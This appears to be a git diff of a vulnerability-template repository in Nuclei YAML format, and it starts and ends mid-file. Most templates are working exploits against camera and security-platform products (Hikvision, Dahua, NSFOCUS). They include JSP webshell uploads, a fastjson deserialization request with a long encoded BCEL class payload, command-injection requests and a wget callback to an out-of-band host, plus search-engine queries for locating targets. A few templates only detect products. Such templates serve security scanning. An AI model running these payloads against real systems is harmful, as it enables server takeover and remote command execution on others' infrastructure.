+ --c4155aff43901a8b2a19a4641a5efa15--
+
+ - |
+ GET /eps/upload/{{name}}.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: json
+ name: name
+ json:
+ - ".data.resourceUuid"
+ internal: true
matchers:
- type: word
words:
- - "nt authority\\system"
+ - '{{randstr}}'
diff --git a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml
index 7f081b05e0..0ebd67934b 100644
--- a/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml
+++ b/poc/microsoft/Hikvision_iVMS-8700_upload_action.yaml
@@ -1,48 +1,27 @@
id: HIKVISION
info:
- name: HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 upload Webshell file
+ name: HIKVISION
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- HIKVISION iVMS-8700 Comprehensive Security Management Platform 1 There is an arbitrary file upload vulnerability where attackers can control the server by sending specific request packets to upload Webshell files
+ There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability
metadata:
- fofa-query: icon_hash="-911494769"
- hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
+ fofa-query: app="HIKVISION-综合安防管理平台"
+ hunter-query: web.title="综合安防管理平台"
-variables:
- str1: '{{rand_base(6)}}'
- str2: '{{rand_base(6)}}'
- str3: '<%out.print("{{str2}}");%>'
-
http:
- raw:
- |
- POST /eps/resourceOperations/upload.action HTTP/1.1
+ POST /bic/ssoService/v1/applyCT HTTP/1.1
Host: {{Hostname}}
- User-Agent: MicroMessenger
- Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
-
- ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
- Content-Disposition: form-data; name="fileUploader";filename="{{str1}}.jsp"
- Content-Type: image/jpeg
-
- {{str3}}
- ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
-
- - |
- GET /eps/upload/{{res_id}}.jsp HTTP/1.1
- Host: {{Hostname}}
-
- extractors:
- - type: json
- name: res_id
- json:
- - ".data.resourceUuid"
- internal: true
+ Content-Type: application/json
+ Testcmd: whoami
+
+ {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}}
matchers:
- - type: dsl
- dsl:
- - body_2 == str2
+ - type: word
+ words:
+ - "nt authority\\system"
diff --git a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml
index fa3aafbfe2..c7afb0444b 100644
--- a/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml
+++ b/poc/microsoft/dahua-wpms-addimgico-fileupload.yaml
@@ -1,68 +1,50 @@
id: CVE-2023-3836
info:
- name: Dahua Smart Park Management - Arbitrary File Upload
- author: HuTa0
- severity: critical
+ name: 大华-WPMS-upload-addimgico
+ author: hufei
+ severity: high
description: |
- Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.
- remediation: |
- Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability.
+ 大华 智慧园区综合管理平台 devicePoint_addImgIco 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限
reference:
- - https://github.com/qiuhuihk/cve/blob/main/upload.md
- - https://nvd.nist.gov/vuln/detail/CVE-2023-3836
- - https://vuldb.com/?ctiid.235162
- - https://vuldb.com/?id.235162
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2023-3836
- cwe-id: CWE-434
- epss-score: 0.03083
- epss-percentile: 0.8997
- cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:*
+ https://github.com/PeiQi0/PeiQi-WIKI-Book/tree/main/docs/wiki/iot/%E5%A4%A7%E5%8D%8E
metadata:
+ max-request: 1
+ fofa-query: app="大华-智慧园区综合管理平台"
+ hunter-query: app.name="Dahua 大华 智慧园区管理平台"
verified: true
- max-request: 2
- vendor: dahuasecurity
- product: smart_parking_management
- shodan-query: html:"/WPMS/asset"
- zoomeye-query: /WPMS/asset
- tags: cve,cve2023,dahua,fileupload,intrusive,rce
-variables:
- random_str: "{{rand_base(6)}}"
- match_str: "{{md5(random_str)}}"
http:
- raw:
- |
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
- Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_8 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/11.8w0575.0 Mobile/69G115 Safari/533.0
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Length: 177
+ Content-Type: multipart/form-data; boundary=e00b34d08d13639f8b619829b04c1a29
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT
- Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp"
- Content-Type: application/octet-stream
- Content-Transfer-Encoding: binary
+ --e00b34d08d13639f8b619829b04c1a29
+ Content-Disposition: form-data; name="upload"; filename="test.jsp"
+ Content-Type: image/gif
+
+ {{randstr}}
+ --e00b34d08d13639f8b619829b04c1a29--
- {{match_str}}
- --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--
- |
- GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1
+ GET /upload/emap/society_new/{{name}} HTTP/1.1
Host: {{Hostname}}
- matchers:
- - type: dsl
- dsl:
- - "status_code_1 == 200 && status_code_2 == 200"
- - "contains(body_2, '{{match_str}}')"
- condition: and
-
extractors:
- - type: regex
- name: shell_filename
+ - type: json
+ name: name
+ json:
+ - ".data"
internal: true
- part: body_1
- regex:
- - 'ico_res_(\w+)_on\.jsp'
-# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ matchers:
+ - type: word
+ words:
+ - '{{randstr}}'
\ No newline at end of file
diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml
index a8f9cbe173..b35ef84818 100644
--- a/poc/other/Nsfocus_sas_getFile_read.yaml
+++ b/poc/other/Nsfocus_sas_getFile_read.yaml
@@ -1,59 +1,49 @@
id: Green-Alliance
info:
- name: Green Alliance NF Next Generation Firewall Arbitrary File Upload Vulnerability
+ name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- Green Alliance SSL VPN has an arbitrary file upload vulnerability, allowing attackers to obtain server privileges and execute remote commands by sending special request packets
+ Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability
metadata:
- fofa-query: app="NSFOCUS-下一代防火墙"
- hunter-query: web.title="用户认证 - NSFOCUS NF"
-
+ fofa-query: body="'/needUsbkey.php?username='"
+ hunter-query: web.body="'/needUsbkey.php?username='"
http:
- - raw:
- - |
- POST /api/v1/device/bugsInfo HTTP/1.1
- Host: {{Host}}:8081
- Content-Type: multipart/form-data; boundary=1d52ba2a11ad8a915eddab1a0e85acd9
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Content-Length: 238
- Accept-Encoding: gzip, deflate
- Connection: close
-
- --1d52ba2a11ad8a915eddab1a0e85acd9
- Content-Disposition: form-data; name="file"; filename="sess_82c13f359d0dd8f51c29d658a9c8ac72"
-
- lang|s:52:"../../../../../../../../../../../../../../../../tmp/";
- --1d52ba2a11ad8a915eddab1a0e85acd9--
-
- - |
- POST /api/v1/device/bugsInfo HTTP/1.1
- Host: {{Host}}:8081
- Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Content-Length: 217
- Accept-Encoding: gzip, deflate
- Connection: close
-
- --4803b59d015026999b45993b1245f0ef
- Content-Disposition: form-data; name="file"; filename="compose.php"
-
-
- --4803b59d015026999b45993b1245f0ef--
-
- - |
- GET /mail/include/header_main.php HTTP/1.1
- Host: {{Host}}:4433
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
- Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac72
+ - method: GET
+ path:
+ - "{{BaseURL}}/webconf/Exec/index?cmd=id"
+ matchers-condition: and
matchers:
- - type: dsl
- dsl:
- - "status_code_1 == 200 && contains(body_1, 'upload file success')"
- - "status_code_2 == 200 && contains(body_2, 'upload file success')"
- - "status_code_3 == 200 && contains(body_3, '{{randstr}}')"
- condition: and
+ - type: word
+ part: body
+ words:
+ - "200"
+
+ - type: status
+ status:
+ - 200
+
+
+# http:
+# - method: GET
+# path:
+# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}"
+
+# attack: clusterbomb
+# matchers-condition: or
+# matchers:
+# - type: word
+# part: interactsh_protocol
+# name: http
+# words:
+# - "http"
+
+# - type: word
+# part: interactsh_protocol
+# name: dns
+# words:
+# - "dns"
diff --git a/poc/other/fastbee.yaml b/poc/other/fastbee.yaml
new file mode 100644
index 0000000000..4624911885
--- /dev/null
+++ b/poc/other/fastbee.yaml
@@ -0,0 +1,20 @@
+id: fastbee
+info:
+ name: fastbee
+ author: cn-kali-team
+ tags: detect,tech,fastbee
+ severity: info
+ metadata:
+ fofa-query:
+ - fastbee
+ product: fastbee
+ vendor: fastbee
+ verified: true
+http:
+- method: GET
+ path:
+ - '{{BaseURL}}/'
+ matchers:
+ - type: word
+ words:
+ - fastbee
diff --git a/poc/other/horizon.yaml b/poc/other/horizon.yaml
index 4627d13031..0534f296d9 100644
--- a/poc/other/horizon.yaml
+++ b/poc/other/horizon.yaml
@@ -1,21 +1,24 @@
id: vmware-horizon
+
info:
- name: VMware Horizon Login
- author: dhiyaneshDK
+ name: VMware Horizon
+ author: pdteam
severity: info
- reference: https://www.exploit-db.com/ghdb/6496
- tags: panel
+ tags: vmware,horizon
+
requests:
- method: GET
path:
- - '{{BaseURL}}/portal/webclient/index.html'
- matchers-condition: or
+ - "{{BaseURL}}"
+
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
matchers:
+ - type: status
+ status:
+ - 200
+
- type: word
- part: body
words:
- - 'VMware Horizon'
- - type: regex
- part: body
- regex:
- - '(?m)^Missing route token in request$'
+ - 'VMware Horizon'
diff --git a/poc/other/mercurial-hgignore.yaml b/poc/other/mercurial-hgignore.yaml
new file mode 100644
index 0000000000..c05141fe49
--- /dev/null
+++ b/poc/other/mercurial-hgignore.yaml
@@ -0,0 +1,49 @@
+id: mercurial-hgignore
+
+info:
+ name: Mercurial Ignore - File Disclosure
+ author: DhiyaneshDK
+ severity: info
+ description: Mercurial Ignore file disclosure was detected.
+ reference:
+ - https://swcarpentry.github.io/hg-novice/08-ignore/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"hgignore"
+ tags: exposure,hgignore,config,mercurial
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/.hgignore"
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'len(body) > 50'
+ - 'status_code == 200'
+ condition: and
+
+ - type: word
+ words:
+ - "MongoDB over HTTP on the native"
+ - "application/javascript"
+ - "application/x-javascript"
+ - "application/json"
+ - "application/xml"
+ - "html"
+ - "
------WebKitFormBoundary9PggsiM755PLa54a--
-
+ - |
+ GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
+
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200'
- - 'contains(body_1, "test.jsp")'
+ - 'contains(body_1, "data")'
+ - 'status_code_2 == 200'
+ - 'contains(body_2, "test")'
condition: and
diff --git a/poc/upload/Hikvision_iVMS-8700_upload.yaml b/poc/upload/Hikvision_iVMS-8700_upload.yaml
index 0ebd67934b..7e328a8b1b 100644
--- a/poc/upload/Hikvision_iVMS-8700_upload.yaml
+++ b/poc/upload/Hikvision_iVMS-8700_upload.yaml
@@ -1,27 +1,50 @@
id: HIKVISION
info:
- name: HIKVISION
- author: Zero Trust Security Attack and Defense Laboratory
+ name: HHIKVISION iVMS-8700 upload Webshell file
+ author: zerZero Trust Security Attack and Defense Laboratory
severity: high
description: |
- There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability
+ HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file
metadata:
- fofa-query: app="HIKVISION-综合安防管理平台"
- hunter-query: web.title="综合安防管理平台"
+ fofa-query: icon_hash="-911494769"
+ hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685"
+variables:
+ str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding'
+
http:
- raw:
- |
- POST /bic/ssoService/v1/applyCT HTTP/1.1
+ POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1
Host: {{Hostname}}
- Content-Type: application/json
- Testcmd: whoami
-
- {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87